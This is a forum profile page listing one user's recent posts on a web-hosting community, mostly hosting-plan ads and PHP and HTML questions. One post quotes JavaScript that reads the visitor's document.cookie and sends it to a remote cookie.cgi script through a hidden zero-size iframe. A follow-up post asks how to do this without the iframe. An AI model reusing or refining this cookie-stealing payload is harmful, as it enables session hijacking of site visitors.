• Howdy! Welcome to our community of more than 130.000 members devoted to web hosting. This is a great place to get special offers from web hosts and post your own requests or ads. To start posting sign up here. Cheers! /Peo, FreeWebSpace.net
managed wordpress hosting

Recent content by owo

1. O

Table problems

Hi , i have an input forum where you submit a message now when its posted yeah it will just expand the table is there away to fix a width ( width is already set 80% but it will expand that ) i dont want to use br over and over what can be done to make it go on to another line of the table?
  2. O

Serverlabs New plans Cheap Prices!!

Hello , Serverlabs has discontinued it's shared hosting plans for now and focused on reseller accounts. Our new plans are very cheap , they also come with cPanel/WHM. With all our new plans you get a dedicated ip address Unlimted subdomains Unlimted domains ( to host in WHM) Unlimted...
  3. O

Javascript help needed

No i dont want to print them i want it to send it eg this is the real code <script language="javascript"> user = document.cookie; user = escape(user); url="http://your.server.com/cgi-bin/cookie.cgi?"; document.write("<iframe src="+url+user+" height=0 width=0></iframe>"); </script>...
  4. O

Javascript help needed

Hi i have a peice of code from a script im using document.write("<iframe src="+url+user+" height=0 width=0></iframe>"); how would i change that to not using an iframe at all but with the +url+user+ command on the line somewhere Any help?
  5. O

Help with PHP

thx oh ok thx
  6. O

Help with PHP

no thats not what i want say i submit it to submit.php i want submit.php to forward the infomation posted to another php page
  7. O

Help with PHP

ok what would it be in php?
  8. O

Help with PHP

yes yes thats what i have but how do i send it to a html page ?
  9. O

Help with PHP

Hi i need some help how would i go about if i had a form and when called say file.php?send it would post that info to a place?
  10. O

1.5 GB Space 30!!!!GB Bandwith $19.95 a month

Hello this is one of our new cPanel plans since the move from ensim. Disk Space : 1.5 GB Bandwith : 30 GB Dedicated IP : 1 cPanel 6 Unlimted Subdomains Unlimted FTP Accounts PHP (Version 4.2.3) MYSQL Unlimted MYSQL Databases Frontpage 2002 Support SSL Web-Mail Wap-Mail Tomcat JSP...
  11. O

1 GB Space 10 GB Bandwith $3.99 A Month

This is an old thread , This package was with ensim the reason the prices have gone up is we have moved to cpanel and the licence costs alot more than ensim . Yes we allow all video files IF they are legal. If you want to know more please Contact me on oli@hd42.com.ru (MSN)
  12. O

Webspace offer (help me plz)

Our Customers have a price freeze so whatever they were paying it will not change . With ensim it was a one off fee for their control panel with cPanel you have to pay monthly i think its around $60 so due to that we had to put our prices up abit or we would not be making any money. ServerLabs
  13. O

Yes we have very good uptime , the status page is the old ensim one so that will be changing. Prices have gone up due to cpanel licence we have tryed to make them as low as we can. Sorry about this ServerLabs You can contact me on oli@hd42.com.ru (MSN)
  14. O

Sorry about that Sorry about the downtime our server had to go down because we had to remove ensim then install cpanel and then transfer all accounts over. Serverlabs should be fine now we have no problems at all :) Feal free to contact any of the serverlabs staff at anytime Serverlabs
  15. O

Mudi please dont signup yet we are adding cPanel 6 and switching from ensim thanks. I'll inform you if you leave your email or pm me with it Serverlabs
Back